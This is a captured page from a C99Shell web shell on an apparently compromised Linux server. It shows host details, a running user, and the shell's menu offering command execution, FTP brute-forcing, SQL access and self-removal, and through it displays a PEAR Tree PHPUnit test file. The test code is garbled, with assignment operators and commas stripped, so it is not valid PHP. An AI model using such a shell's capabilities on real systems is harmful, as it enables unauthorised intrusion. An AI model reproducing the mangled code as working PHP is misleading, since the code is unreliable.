!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/lampp/lib/php/test/Tree/tests/   drwxr-xr-x
Free 13.6 GB of 61.93 GB (21.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     removeTest.php (3.84 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
//
//  $Id: removeTest.php 320812 2011-12-09 23:49:34Z danielc $
//

require_once dirname(__FILE__) . '/TreeHelper.php';

class 
tests_removeTest extends TreeHelper
{
/*
    function test_MemoryDBnested()
    {
        $tree = $this->getMemoryDBnested();        
        $ret=$tree->remove(5);
        $tree->setup();

        // Avoid PHPUnit exhausting memory if $ret is a large array or object.
        if (is_bool($ret)) {
            $this->assertTrue($ret);
        } else {
            $this->fail('Expected TRUE but got a ' . gettype($ret));
        }

        // and check if the move succeeded, by checking the new parentId
        //problem here is that memory returns another return value for a not existing element ... shit        
        $this->assertEquals(x, $tree->getElement(5));
    }
*/

    
function test_MemoryDBnestedNoAction()
    {
        
$tree $this->getMemoryDBnested();        
//        $id = $tree->getIdByPath('/Root/child 2/child 2_2');
        
$parentId $tree->getParentId(5);
        
$ret $tree->move(55);
        
$tree->setup();

        
// Avoid PHPUnit exhausting memory if $ret is a large array or object.
        
if (is_bool($ret)) {
            
$this->assertTrue($ret);
        } else {
            
$this->fail('Expected TRUE but got a ' gettype($ret));
        }

        
$this->assertEquals($parentId$tree->getParentId(5));
    }

    function 
test_MemoryMDBnestedNoAction()
    {
        if (!
$this->has_mdb) {
            
$this->markTestSkipped('MDB is not installed');
        }

        
$tree $this->getMemoryMDBnested();        
//        $id = $tree->getIdByPath('/Root/child 2/child 2_2');
        
$parentId $tree->getParentId(5);
        
$ret $tree->move(55);
        
$tree->setup();

        
// Avoid PHPUnit exhausting memory if $ret is a large array or object.
        
if (is_bool($ret)) {
            
$this->assertTrue($ret);
        } else {
            
$this->fail('Expected TRUE but got a ' gettype($ret));
        }

        
$this->assertEquals($parentId$tree->getParentId(5));
    }

    
// do this for XML
            
    // do this for Filesystem

    // do this for DBsimple
  
    // do this for DynamicDBnested
    
function test_DynamicDBnested()
    {
        
$tree =& $this->getDynamicDBnested();
        
$ret $tree->remove(5);

        
// Avoid PHPUnit exhausting memory if $ret is a large array or object.
        
if (is_bool($ret)) {
            
$this->assertTrue($ret);
        } else {
            
$this->fail('Expected TRUE but got a ' gettype($ret));
        }

        
// and check if the element doesnt exist anymore ... this is not 100% sure, since the 
        // returned error message is a string :-(
        // Avoid PHPUnit exhausting memory if $ret is a large array or object.
        
$ret Tree::isError($tree->getElement(5));
        if (
is_bool($ret)) {
            
$this->assertTrue($ret);
        } else {
            
$this->fail('Expected TRUE but got a ' gettype($ret));
        }
    }

    function 
test_DynamicMDBnested()
    {
        if (!
$this->has_mdb) {
            
$this->markTestSkipped('MDB is not installed');
        }

        
$tree =& $this->getDynamicMDBnested();
        
$ret $tree->remove(5);

        
// Avoid PHPUnit exhausting memory if $ret is a large array or object.
        
if (is_bool($ret)) {
            
$this->assertTrue($ret);
        } else {
            
$this->fail('Expected TRUE but got a ' gettype($ret));
        }

        
// and check if the element doesnt exist anymore ... this is not 100% sure, sicne the 
        // returned error message is a string :-(
        // Avoid PHPUnit exhausting memory if $ret is a large array or object.
        
$ret Tree::isError($tree->getElement(5));
        if (
is_bool($ret)) {
            
$this->assertTrue($ret);
        } else {
            
$this->fail('Expected TRUE but got a ' gettype($ret));
        }
    }
}

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.4787 ]--